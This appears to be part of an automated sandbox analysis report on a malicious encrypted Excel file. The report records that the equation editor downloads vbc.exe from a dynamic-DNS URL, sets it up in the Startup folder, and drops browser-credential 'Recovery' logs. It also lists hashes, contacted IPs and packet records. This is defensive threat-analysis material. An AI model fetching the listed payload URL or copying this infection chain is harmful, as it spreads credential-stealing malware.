                                                                                                                                                      New Additional Agreement.exeGet hashmaliciousBrowse
                                                                                                                                                      • 91.195.240.94
                                                                                                                                                      UBEH7JEUC0.exeGet hashmaliciousBrowse
                                                                                                                                                      • 91.195.241.136
                                                                                                                                                      Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                                                                                                      • 91.195.240.94
                                                                                                                                                      UNREAL-SERVERSUSArchivo.Carrefour.fjyuafXasBPksn.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 193.39.186.122
                                                                                                                                                      Archivo.Carrefour.fjyuafXasBPksn.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 193.39.186.122
                                                                                                                                                      LDoSTuNuHc.rtfGet hashmaliciousBrowse
                                                                                                                                                      • 212.162.149.27
                                                                                                                                                      QRD289323_2020.docxGet hashmaliciousBrowse
                                                                                                                                                      • 212.162.149.27
                                                                                                                                                      Bank_Transfer_Copy344939930047474883990.jsGet hashmaliciousBrowse
                                                                                                                                                      • 185.202.175.58
                                                                                                                                                      Transfer_Copy.pdf ....jsGet hashmaliciousBrowse
                                                                                                                                                      • 5.181.166.226
                                                                                                                                                      GAff7oT9aP.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.202.174.36
                                                                                                                                                      Scanned-Document-PDF.jarGet hashmaliciousBrowse
                                                                                                                                                      • 212.162.151.138

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):402944
                                                                                                                                                      Entropy (8bit):7.801833603864588
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:ox6uUEXR4gt0m1jp5+Or3cOENFq7sbYLDApPU+HZw/0qfKIV02WaTs:O+w0ajnb35ENys8LcpP5qCIeis
                                                                                                                                                      MD5:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      SHA1:742C7B23F14EBE783CDEF406B073C6E867266657
                                                                                                                                                      SHA-256:0F26E91C2B802EC98FF2CC6269AD43F09F29E8827D2975F4E6514DB0DF14DB6C
                                                                                                                                                      SHA-512:260F97398C4FC45516C7972FAA365D92DCB92AE7AA6E3ECABF2E839BB08F7EA925BD2F56CD234751BEC8FCC9BCA86D6F5DEAEDDFDF5F1E1C99E21A97DD469DB7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$................0......b......R.... ........@.. ....................................@.....................................O........^...................`......h...8............................................ ............... ..H............text...`.... ...................... ..`.rsrc....^.......`..................@..@.reloc.......`.......$..............@..B................3.......H........a...,...... ...8...0R...........................................0............}......}......}......}......}....."....}....."....}....."....}....."....}....."....}....."....}....."....}....."....}......}......}.....#........}......}......}......}......}......}......}......}......}......}......}......}......}......}......}.....(.......(......(.....*...{3...(....o......{4...(....o.....*...0............{...."..lB.......9......{....".. A....,U..{5.....*...%..{....(.....%.r
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\287BD4C6.jpeg
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):48770
                                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5ACE7399.jpeg
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):48770
                                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B33F8.emf
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1099960
                                                                                                                                                      Entropy (8bit):2.0153092688293803
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:uXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:cahIFdyiaT2qtXw
                                                                                                                                                      MD5:9F063D2E9ACFFABD85C6E71004341966
                                                                                                                                                      SHA1:1752C0EA0C16186897B08820D21CE71EF7B01CDB
                                                                                                                                                      SHA-256:9901323BD817F4F1810D5F7C862FDFEC5CAE931B079954A86F1AA657ED451E28
                                                                                                                                                      SHA-512:8FA93F5A08C30F622912CA157C5885A66044E2C7B9C7731F074B2F7B46C62507451AA580D5E666D34F1A298B380786345CAD9867A80830C980988685078C81C1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.[....x...........d....N.[....x... ....y.1x....... ............z.1............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...x........2.1.................{.1............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                      C:\Users\user\AppData\Roaming\98-QN40B\98-logim.jpeg
                                                                                                                                                      Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):146988
                                                                                                                                                      Entropy (8bit):7.42549693903429
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:nh/mlF+tCVSUxbBEspU1kknkkkkkkkkkkkkkkkkkfzKH8:nNmlF+tBKbBEso8
                                                                                                                                                      MD5:2DE8CDE2E90EB7483F10D8539F1244AA
                                                                                                                                                      SHA1:E19EF4D85FC992BE9A464EF038C22CF431185FB1
                                                                                                                                                      SHA-256:05E851DACA058529D45CCD7E0B054876E7A91FD3C2E048F3EE181862C5B24A33
                                                                                                                                                      SHA-512:F2632A23BE8E3E92E1A194FAF27A96172542DFE17BEC89AC075CDAED4ADBA5F8466BCFD4B888B95FB95299192D5EF9C90690B4CD5927D748CACC11ED11F749A4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...K[kX.M...Hb.I..Y...H...I.*.:....L....*...N.........|A....<..Y'.H.n...9>..M.<.{...Cu~#..3....3.C}Nk....E.9}...u.n..ZN.u2~..$c.X.\.=8#.j.U.F.g....3.7c.?......P.......G.....HHI&(.u........t'...]A..mh@..a....?.#_.ir_%.[....$.T...y....~..E..,.-..W=1.9.3.[...?....B..z..b.'AF........k.-..H..,3......5.....Rp..WJmH.V...uM..=.g.Y(.N.P.eY<.dM.(..2}..W.gEEG<
                                                                                                                                                      C:\Users\user\AppData\Roaming\98-QN40B\98-logrf.ini
                                                                                                                                                      Process:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):2.8420918598895937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:VSiftlAlGQJhIl:VSVlGQPY
                                                                                                                                                      MD5:2F245469795B865BDD1B956C23D7893D
                                                                                                                                                      SHA1:6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
                                                                                                                                                      SHA-256:1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
                                                                                                                                                      SHA-512:909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview: ....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....
                                                                                                                                                      C:\Users\user\AppData\Roaming\98-QN40B\98-logri.ini
                                                                                                                                                      Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):2.8420918598895937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                                                                                                                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                                                                                                                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                                                                                                                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                                                                                                                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                                                                                                                      C:\Users\user\AppData\Roaming\98-QN40B\98-logrv.ini
                                                                                                                                                      Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):2.96096404744368
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                                                                                                                      MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                                                                                                                      SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                                                                                                                      SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                                                                                                                      SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
                                                                                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):402944
                                                                                                                                                      Entropy (8bit):7.801833603864588
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:ox6uUEXR4gt0m1jp5+Or3cOENFq7sbYLDApPU+HZw/0qfKIV02WaTs:O+w0ajnb35ENys8LcpP5qCIeis
                                                                                                                                                      MD5:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      SHA1:742C7B23F14EBE783CDEF406B073C6E867266657
                                                                                                                                                      SHA-256:0F26E91C2B802EC98FF2CC6269AD43F09F29E8827D2975F4E6514DB0DF14DB6C
                                                                                                                                                      SHA-512:260F97398C4FC45516C7972FAA365D92DCB92AE7AA6E3ECABF2E839BB08F7EA925BD2F56CD234751BEC8FCC9BCA86D6F5DEAEDDFDF5F1E1C99E21A97DD469DB7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$................0......b......R.... ........@.. ....................................@.....................................O........^...................`......h...8............................................ ............... ..H............text...`.... ...................... ..`.rsrc....^.......`..................@..@.reloc.......`.......$..............@..B................3.......H........a...,...... ...8...0R...........................................0............}......}......}......}......}....."....}....."....}....."....}....."....}....."....}....."....}....."....}....."....}......}......}.....#........}......}......}......}......}......}......}......}......}......}......}......}......}......}......}.....(.......(......(.....*...{3...(....o......{4...(....o.....*...0............{...."..lB.......9......{....".. A....,U..{5.....*...%..{....(.....%.r
                                                                                                                                                      C:\Users\user\Desktop\~$PO11272020.xlsx
                                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):330
                                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):402944
                                                                                                                                                      Entropy (8bit):7.801833603864588
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:ox6uUEXR4gt0m1jp5+Or3cOENFq7sbYLDApPU+HZw/0qfKIV02WaTs:O+w0ajnb35ENys8LcpP5qCIeis
                                                                                                                                                      MD5:0E7D12AD28411F68D62D3D3F17382B98
                                                                                                                                                      SHA1:742C7B23F14EBE783CDEF406B073C6E867266657
                                                                                                                                                      SHA-256:0F26E91C2B802EC98FF2CC6269AD43F09F29E8827D2975F4E6514DB0DF14DB6C
                                                                                                                                                      SHA-512:260F97398C4FC45516C7972FAA365D92DCB92AE7AA6E3ECABF2E839BB08F7EA925BD2F56CD234751BEC8FCC9BCA86D6F5DEAEDDFDF5F1E1C99E21A97DD469DB7
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$................0......b......R.... ........@.. ....................................@.....................................O........^...................`......h...8............................................ ............... ..H............text...`.... ...................... ..`.rsrc....^.......`..................@..@.reloc.......`.......$..............@..B................3.......H........a...,...... ...8...0R...........................................0............}......}......}......}......}....."....}....."....}....."....}....."....}....."....}....."....}....."....}....."....}......}......}.....#........}......}......}......}......}......}......}......}......}......}......}......}......}......}......}.....(.......(......(.....*...{3...(....o......{4...(....o.....*...0............{...."..lB.......9......{....".. A....,U..{5.....*...%..{....(.....%.r

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:CDFV2 Encrypted
                                                                                                                                                      Entropy (8bit):7.996717248115978
                                                                                                                                                      TrID:
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                      File name:PO11272020.xlsx
                                                                                                                                                      File size:2454528
                                                                                                                                                      MD5:c2803754fbf19c0073d2dbf2f0fc3871
                                                                                                                                                      SHA1:70b8cad0d3d02eb3dfce050ccaae691e11369416
                                                                                                                                                      SHA256:6774d42ba390417c371d6f46316b3ae3c216c80f8a46b9b3f8906fe9f054f219
                                                                                                                                                      SHA512:27b3fc00bc6fd2dbe8e21eb5a75e94846d8b94ea812ab893d38daa30f9e1f39313361d6b6a8205da355344435b1a74036e2b3a90cf6bf09742542a861292355f
                                                                                                                                                      SSDEEP:49152:pXPc9v938KJldC/ct00SIO7pNGFQQNh52YuFQYyQ8nfRd0Oh8loKw12dC:OF8KJlSct0np8FLNzxunyjJd0OhUWSC
                                                                                                                                                      File Content Preview:........................>...................&...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "PO11272020.xlsx"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:False
                                                                                                                                                      Application Name:unknown
                                                                                                                                                      Encrypted Document:True
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:False
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:False

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:64
                                                                                                                                                      Entropy:2.73637206947
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:112
                                                                                                                                                      Entropy:2.7597816111
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:200
                                                                                                                                                      Entropy:3.13335930328
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:76
                                                                                                                                                      Entropy:2.79079600998
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 2431000
                                                                                                                                                      General
                                                                                                                                                      Stream Path:EncryptedPackage
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:2431000
                                                                                                                                                      Entropy:7.9999248079
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . % . . . . . . . . e l . . t . O . . . . . . C . r . . . k . . . . . . . . . . . . . h , . . . 1 K . . U . . . . . . . F X . . n $ $ . g 3 . . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q . . S . . . T = ) . N # 1 C X q .
                                                                                                                                                      Data Raw:01 18 25 00 00 00 00 00 db 0f af 65 6c 81 bd 74 ac 4f f9 89 dc 93 ab ea 43 03 72 8f 08 fe 6b b7 c5 f5 ae 06 c7 c4 2e aa f0 cf c4 af 68 2c ae bd a6 31 4b cf dc 55 0a fc 9a c9 89 c9 90 46 58 d6 8b 6e 24 24 82 67 33 e7 c8 4e 23 31 43 58 71 83 f6 53 0b d3 af 54 3d 29 c8 4e 23 31 43 58 71 83 f6 53 0b d3 af 54 3d 29 c8 4e 23 31 43 58 71 83 f6 53 0b d3 af 54 3d 29 c8 4e 23 31 43 58 71 83
                                                                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                      General
                                                                                                                                                      Stream Path:EncryptionInfo
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:224
                                                                                                                                                      Entropy:4.54559221884
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . 6 . + % Z ? . . . . . . N m . . . c . @ ! . . . . c 0 . . . . . : . . s . . . . . . . . . . 6 . ; . I n & ` . . . . S < . . .
                                                                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                      Network Behavior

                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                      11/27/20-12:16:45.849770TCP1201ATTACK-RESPONSES 403 Forbidden804916791.195.241.137192.168.2.22

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 27, 2020 12:15:43.118541956 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.253726959 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.253829002 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.254117012 CET4916580192.168.2.22162.251.123.239
                                                                                                                                                      Nov 27, 2020 12:15:43.391005039 CET8049165162.251.123.239192.168.2.22
                                                                                                                                                      Nov 27, 2020 12:15:43.391084909 CET8049165162.251.123.239192.168.2.22
